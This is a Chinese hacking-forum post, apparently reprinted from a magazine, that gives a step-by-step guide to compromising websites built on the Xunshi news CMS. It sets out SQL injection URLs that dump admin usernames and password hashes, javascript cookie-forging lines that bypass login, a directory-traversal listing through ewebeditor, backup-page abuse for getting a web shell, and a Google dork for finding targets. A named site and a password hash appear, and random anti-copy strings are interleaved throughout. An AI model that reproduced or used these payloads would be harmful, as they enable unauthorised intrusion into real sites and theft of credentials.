讯时漏洞总结

admin

by:血封忆尘
7 v+ F* e/ [$ t8 C
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）

以下本文总结来自黑防去年第9期杂志上的内容...
$ A. V9 P9 ]: d- ^
! u0 K7 S( x; O2 o+ d- T先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
) O% ^& w0 r/ N; W# x0 m6 n
记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
这里一个注入
2 X5 |( a5 h8 A& ~9 o3 T1 T
效果如图:
4 @) z3 m) X2 }2 Y  t# k9 s' O' N

9 b/ g# Y8 G) \, I7 L
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
3 N' A; v2 @* s. t4 }
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
# {9 l/ \: B) u2 i' Y
3 N* s9 R! z1 F) d1 Ejavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

0 P9 B) p, V8 Q. p那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
( W! T- m) F) A: }1 Y
, }& \; I' m0 [' i因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞

8 G$ v2 Q0 M' H, _, F" X它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
- ]. l$ I' S9 N, w3 g# w
访问这页面来列目录..步骤如下:
1 C% D2 }5 k% N2 J8 N
# B1 K' ]1 N/ m8 s  E! S0 S8 ejavascript:alert(document.cookie="admindj=1")

( |2 r2 u5 Q9 yhttp://www.political-security.co ... asp?id=46&dir=../..
3 r3 K1 ?' d6 }
效果如图:


. Q4 `/ A# d9 u
这样全站目录都能瞧了..找到后台目录..进去..

那么进了后台怎么拿shell？？上传--备份就ok了..

那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
6 D" f4 y. q. ?% ]# W
0 y- t2 R( p8 m3 u' q8 ]这个我也碰到过一次..你都可以通过列目录来实现..
; s$ L0 K" x- z/ ?) H* l+ S3 {) x: ~
$ I0 V" g  p% H; h6 D4 Ejavascript:alert(document.cookie="admindj=1")

http://www.political-security.co ... p?action=BackupData

备份ok..

3 l2 h- [2 b+ h% g/ }那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?

在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
' l4 R. S% n) B8 W7 |
; Q7 R- _# s( E然后访问此页面进行注入..步骤如下:
! [/ s; {9 R0 e
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
# c: k2 k+ F" |3 l% j
$ ^% v+ g7 X6 r然后请求admin/admin_chk.asp页面
! i7 }# G% A9 p; F0 N- F
) `! @* w' ]3 b3 C5 L输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
8 {- A6 f+ e# ~2 f' L6 F
. S4 a% j, }! e% y' d1 u* U  r# O26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
7 q7 V5 F, J' D4 A: f
1 T* |4 Y3 {. |! v效果如图所示:
( E0 h% t6 C' `6 j( ^


讯时漏洞2
. D2 h" d  u/ r( L$ w# J* v6 vgoogle关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
- g1 M5 i7 Y: C
& C! o9 P! d# f( g& Z8 F7 Z1、/admin/admin_news_pl_view.asp?id=1
* s; e5 y9 [3 T8 j//id任意 填入以下语句

2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！
6 h& R1 J6 x( k8 P


1 ?. L7 M  n6 P% s/ u; s3 s3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='


1 [$ ]) h! d! U# {1 J7 \6 M
爆出管理员帐号和密码了

! M7 D7 f5 G9 F0 {. a0 a

: E9 Q' p4 Q6 M4、cookies进后台
  n7 J: \' }8 b/ |- J, S
1 u* s3 y% V5 c! @javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
& Q7 A; i* {1 e" J) X
- N/ X8 y, b1 a8 A
% n4 g8 R- h* u/ F- J
3 g  L: A. H' F# G9 `1 y5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！

9 r9 B- n" X' q7 H. O* o0 }% V

6、后台有上传和备份取SHELL不难。
3 q; e9 E* e: w0 z6 v( q
( C; [3 j" K) U" s/ @& `  d2 Y7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..

  }$ y3 [; }; p: H6 O1 `9 f% ~逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
9 v7 z3 u. _$ o
' }4 ^- o& z) J, q) b- M" e  K
+ P( n) }5 N6 t. Y$ Z: D